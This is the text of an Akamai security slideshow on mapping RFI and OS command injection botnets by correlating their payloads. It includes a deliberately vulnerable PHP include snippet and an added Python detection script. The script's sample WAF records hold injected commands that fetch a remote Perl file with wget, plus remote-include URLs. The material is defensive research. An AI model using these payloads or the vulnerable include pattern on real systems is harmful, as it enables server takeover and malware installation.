Using data from the Akamai Intelligent Platform™, Akamai has developed a new analysis technique for web application layer botnets. By locating WAF triggers related to both Remote File Inclusion attacks and OS Command Injection attacks, researchers used aggregated results to map multiple botnets operating in the studied time period. Viewing the data in this manner yielded additional insight into the botnets and their respective capabilities. This presentation offers a summary of this technique as excerpted from the State of the Internet Q4 2014 Security Report. Watch this slideshow and then get more details at http://bit.ly/1GEbAZ9
= Intelligent Platform™
Automate discovery of web application vulnerabilities for Remote File Inclusion (RFI) and OS Command Injection attacks
Botnets profiled by identifying malicious code resource URLs and seemingly identical payloads
Analysis does not require inclusion in the botnet or taking over the botnet's command and control (C&C, C2) server
[Download the Q4 2014 Global DDoS Attack Report for supporting data and analysis]
2 / [The State of the Internet] / Security (Q4 2014)
= Remote File Inclusion (RFI) attacks
Used to exploit dynamic file include mechanisms in web applications
Web application can be tricked into including remote files with malicious code
RFI vulnerabilities are easily found and exploited by attackers

$dir = $_GET['module_name'];
include($dir . "/function.php");

Figure 1: Code vulnerable to a Remote File Inclusion attack
= OS Command Injection
Used to execute unauthorized operating system commands
The result of mixing trusted code with untrusted data
Commands executed by the attacker run with the same privileges as the commanding component
Attackers can leverage this ability to gain access to, and damage, parts of the system that are not otherwise reachable
= common payloads in botnets
RFI and OS Command Injection are among the most prevalent vulnerabilities reported
Attacker can take full control over the victim server
The most favorable attack vector
In recent months, Akamai has observed massively orchestrated attempts to find such vulnerabilities
Botnet machines, even geographically disparate machines belonging to different organizations, try to inject the same remote piece of malicious code
Code correlations enabled Akamai to map multiple Internet botnets operating at the time of the comparison
= botnet findings
RFI and OS Command Injection botnets targeted more than 850 web applications across several top-level domains over a seven-day period
All of the botnet traffic appeared to originate from compromised servers, most from popular Software-as-a-Service (SaaS) and cloud hosting providers
The botnet Akamai analyzed included a dedicated Python script that performed web crawling disguised as a Microsoft Bing bot
In one instance, an observed botnet propagated through two WordPress TimThumb vulnerabilities
= analysis of botnet capabilities
Both RFI and OS Command Injection attacks used the same malicious code involving:
Remote shell command execution
Remote file upload (see figure)
SMS sending, controlled by IRC commands
Local FTP server credentials brute force attack
IRC-controlled UDP/TCP denial of service flood

Figure 2: Code for remote file upload
= conclusion
Novel approach to understanding web application-layer botnets
Used attack payload as the common denominator to aggregate data and map botnet information
Does not require the researcher to be a part of the botnet or to take over the botnet's C2 server
Can be used for mapping other types of malicious activities that use a distinct payload
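The payload-correlation technique summarized on the "common payloads" slide and restated in this conclusion, as an added Python example that is not part of the Akamai report: it reads constructed WAF trigger records, classifies each as RFI or OS command injection, canonicalizes the remote malicious-code URL, and groups distinct sources that inject the same resource into candidate botnets. The record layout, the field names and the two regexes are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"<>;|&`]+", re.IGNORECASE)
SHELL_META_RE = re.compile(r"[;|&`]|\$\(")

# Constructed WAF trigger records (not taken from the report): source IP,
# attacked host, and the request parameter that fired the WAF rule.
SAMPLE_TRIGGERS = [
    ("198.51.100.10", "shop.example", "module_name=http://203.0.113.5/x/bot.txt?"),
    ("198.51.100.22", "news.example", "module_name=http://203.0.113.5/x/bot.txt??"),
    ("203.0.113.77", "shop.example", "page=HTTP://203.0.113.5/X/BOT.TXT"),
    ("192.0.2.3", "cms.example", "cmd=;wget http://198.51.100.200/k.pl -O /tmp/k"),
    ("192.0.2.9", "blog.example", "cmd=|wget http://198.51.100.200/k.pl -O /tmp/k"),
    ("192.0.2.15", "cms.example", "q=ordinary search text"),
]

def normalize_url(url):
    """Canonical key for a malicious code resource URL: case-folded, scheme
    and query dropped, so variants of one resource collapse to one key."""
    parts = urlsplit(url.lower())
    return parts.netloc + parts.path

def classify(param):
    """Return (vector, payload_key); vector is 'RFI', 'OSCI' or None."""
    _name, _, value = param.partition("=")
    url = URL_RE.search(value)
    if url is None:
        return None, None
    if value.lower().startswith(("http://", "https://")):
        return "RFI", normalize_url(url.group(0))      # remote include
    if SHELL_META_RE.search(value):
        return "OSCI", normalize_url(url.group(0))     # shell fetches remote code
    return None, None

def map_botnets(triggers, min_sources=2):
    """Group triggers by payload key. Distinct sources injecting the same
    remote code is the signal the report uses to outline one botnet."""
    groups = defaultdict(lambda: {"sources": set(), "targets": set(), "vectors": set()})
    for src, host, param in triggers:
        vector, key = classify(param)
        if key is None:
            continue
        groups[key]["sources"].add(src)
        groups[key]["targets"].add(host)
        groups[key]["vectors"].add(vector)
    return {k: g for k, g in groups.items() if len(g["sources"]) >= min_sources}

if __name__ == "__main__":
    for key, g in map_botnets(SAMPLE_TRIGGERS).items():
        print(key, sorted(g["vectors"]), sorted(g["sources"]), sorted(g["targets"]))
```

Nothing here joins or interacts with a botnet; it only correlates triggers the WAF has already recorded, which is the point the conclusion makes.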
= Q4 2014 global attack report
Download the Q4 2014 State of the Internet Security Report. The Q4 2014 report covers:
/ Analysis of DDoS attack trends
/ Breakdown of average Gbps/Mbps statistics
/ Year-over-year and quarter-by-quarter analysis
/ Types and frequency of application-layer attacks
/ Types and frequency of infrastructure attacks
/ Trends in attack frequency, size and sources
/ Where and when DDoSers launch attacks
/ Case study and analysis
= about Prolexic
StateoftheInternet.com, brought to you by Akamai, serves as the home for content and information intended to provide an informed view into online connectivity and cybersecurity trends as well as related metrics, including Internet connection speeds, broadband adoption, mobile usage, outages, and cyber-attacks and threats.
Visitors to www.stateoftheinternet.com can find current and archived versions of Akamai's State of the Internet (Connectivity and Security) reports, the company's data visualizations, and other resources designed to put context around the ever-changing Internet landscape.